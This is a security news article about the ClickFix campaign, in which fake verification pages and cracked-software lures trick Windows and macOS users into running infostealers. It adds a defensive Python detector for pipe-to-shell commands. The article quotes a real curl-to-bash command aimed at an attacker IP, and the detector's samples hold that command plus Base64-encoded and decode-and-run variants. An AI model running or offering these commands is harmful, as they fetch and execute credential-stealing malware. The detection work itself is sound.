A new and increasingly effective social engineering attack, dubbed ClickFix, is targeting both Windows and macOS users to deploy potent infostealer malware. This sophisticated technique deceives users into executing commands directly within their operating system’s command line, ultimately leading to the installation of malicious software designed to steal sensitive information. The ClickFix attack has gained traction due to its ability to bypass traditional email security measures and operate within the confines of browser sandboxes, rendering most security tools ineffective in detecting the malicious activity.
The attack typically originates when individuals search for cracked software or free versions of paid applications through search engines. Cybercriminals meticulously craft deceptive landing pages, strategically hosting them on trusted platforms such as Google Colab, Drive, Sites, and Groups. This tactic is employed to evade detection and blocking by security systems. Upon reaching these pages, victims are redirected based on their operating system. Windows users are presented with the ACR stealer, while macOS users are directed to pages that deploy the Odyssey infostealer.
Intel471 security researchers first identified this widespread campaign in June 2025 during routine malware hunting operations. Their investigation revealed that threat actors behind the ClickFix campaign were successfully exploiting both major operating systems through a unified and shared infrastructure, demonstrating a significant level of coordination and technical capability.
The ClickFix Infection Mechanism and Technical Execution
What distinguishes the ClickFix attack as particularly concerning is its reliance on fileless execution. When unsuspecting victims copy and paste the provided commands into their operating system's command line, the malicious payloads are loaded directly into memory rather than written to disk as a downloaded installer. This fileless nature makes the malware far harder to catch for traditional antivirus software and endpoint detection solutions that rely chiefly on scanning files for known signatures.
For Windows users, the infection chain involves a series of redirections culminating in a MEGA file hosting page. This page contains a password-protected ZIP archive. Inside this archive, the ACR stealer is disguised as a legitimate executable file, often named setup.exe. The ACR stealer is not only designed to steal credentials and personal data but also functions as a loader for additional threats. It has been observed installing other malware, such as SharkClipper, a cryptocurrency clipboard hijacker, further escalating the potential damage to the victim’s system and financial assets.
macOS users encounter a different, yet equally insidious, approach. They typically land on a page designed to mimic a Cloudflare security check. When users attempt to copy what appears to be a verification string from this fake page, they inadvertently copy a Base64-encoded shell command; once decoded and run, it fetches and executes a malicious script. The decoded command, as observed by researchers, is typically structured as follows: curl -s http://45.135.232.33/droberto39774 | nohup bash. This command silently downloads and executes the Odyssey infostealer, with nohup keeping the script alive even if the terminal session that launched it is closed.
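The two paragraphs above describe the defender's problem in a nutshell: the payload never touches disk until the user pastes a command, so the command line itself is the best artifact to inspect. The following Python script is an added example, not code from the article or from Intel471, showing how a detection rule over shell history, EDR process-creation events or a clipboard log could flag the pattern. It checks for download-and-pipe-to-shell constructs, for inline Base64 decoding fed to a shell, and it decodes any long Base64 token to see whether the same pattern hides inside. The sample inputs are constructed for the test; only the first reproduces the command quoted above, and the regexes and rule names are this example's own choices.

```python
import base64
import binascii
import re

# Rule 1: curl/wget output piped (optionally via sudo/nohup) straight into a shell.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:(?:sudo|nohup)\s+)*(?:ba|z|k|da)?sh\b",
    re.IGNORECASE,
)
# Rule 2: an encoded blob decoded inline and piped into a shell (base64 -d | bash).
DECODE_TO_SHELL = re.compile(
    r"base64\s+(?:-d|--decode)\b[^|;&\n]*\|\s*(?:(?:sudo|nohup)\s+)*(?:ba|z)?sh\b",
    re.IGNORECASE,
)
# Candidate Base64 tokens: long runs of the Base64 alphabet plus optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Words that make decoded text look like a shell command worth a closer look.
SHELL_WORDS = re.compile(r"\b(?:curl|wget|nohup|bash)\b", re.IGNORECASE)

# The command quoted in the article (used here only as a string to match against).
OBSERVED_COMMAND = "curl -s http://45.135.232.33/droberto39774 | nohup bash"
ENCODED_OBSERVED = base64.b64encode(OBSERVED_COMMAND.encode()).decode()

# Constructed sample inputs: one observed command, two ways it could be wrapped
# in a Base64 "verification string", and two benign commands for comparison.
SAMPLE_COMMANDS = [
    OBSERVED_COMMAND,
    "echo " + ENCODED_OBSERVED + " | base64 -d | bash",   # constructed: decode-and-run
    ENCODED_OBSERVED,                                      # constructed: bare blob on clipboard
    "curl -s https://example.com/status.json | jq .",      # constructed: benign curl usage
    "git pull --rebase origin main",                       # constructed: benign
]


def decode_base64_tokens(text):
    """Return (token, decoded_text) for every token that decodes to printable text."""
    decoded_tokens = []
    for tok in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: skip
        if all(c.isprintable() or c in "\n\t" for c in decoded):
            decoded_tokens.append((tok, decoded))
    return decoded_tokens


def analyze_command(cmd):
    """Return a list of (rule_name, evidence) findings for one command string."""
    findings = []
    m = PIPE_TO_SHELL.search(cmd)
    if m:
        findings.append(("pipe_to_shell", m.group(0)))
    m = DECODE_TO_SHELL.search(cmd)
    if m:
        findings.append(("decode_to_shell", m.group(0)))
    # Look inside any Base64 blob for the same download-and-execute pattern.
    for _tok, decoded in decode_base64_tokens(cmd):
        if PIPE_TO_SHELL.search(decoded) or DECODE_TO_SHELL.search(decoded):
            findings.append(("encoded_pipe_to_shell", decoded.strip()))
        elif SHELL_WORDS.search(decoded):
            findings.append(("encoded_shell_command", decoded.strip()))
    return findings


def triage(commands):
    """Map each command to its findings; an empty list means nothing suspicious."""
    return {cmd: analyze_command(cmd) for cmd in commands}


if __name__ == "__main__":
    for cmd, findings in triage(SAMPLE_COMMANDS).items():
        verdict = "SUSPICIOUS" if findings else "clean"
        print(f"[{verdict}] {cmd[:60]}")
        for rule, evidence in findings:
            print(f"    {rule}: {evidence}")
```

In practice the same three checks map directly onto an EDR query over process command lines (the parent being a terminal emulator or a browser-spawned shell is a useful extra condition), and the Base64 decoding step is what keeps the "verification string" disguise from defeating a plain keyword match.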
The Odyssey stealer is capable of harvesting a broad spectrum of sensitive data from macOS systems. This includes stored passwords, browser cookies, cryptocurrency wallet credentials, information from Apple Notes, Keychain entries, and other critical system data. Once exfiltrated, this collected information is compressed into an archive file named out.zip for seamless transfer back to the attackers.
The ongoing evolution of social engineering tactics like ClickFix underscores the persistent threat posed by infostealer malware. The effectiveness of this method highlights the importance of user education regarding the risks associated with searching for and downloading cracked software. Users must remain vigilant against deceptive online content, especially when prompted to execute commands or download files from untrusted sources. The reliance on fileless execution and cloaking within trusted platforms presents a significant challenge for current cybersecurity defenses.
Moving forward, cybersecurity researchers will continue to monitor the development and deployment of the ClickFix attack and similar social engineering schemes. The focus will be on identifying new variations, understanding their infrastructure, and developing more robust detection and prevention mechanisms. The reliance on trusted platforms by attackers suggests a need for enhanced security protocols on these platforms themselves, alongside continued efforts to educate end-users about the evolving landscape of cyber threats. The battle against infostealer malware requires a multi-faceted approach, combining technical solutions with heightened user awareness.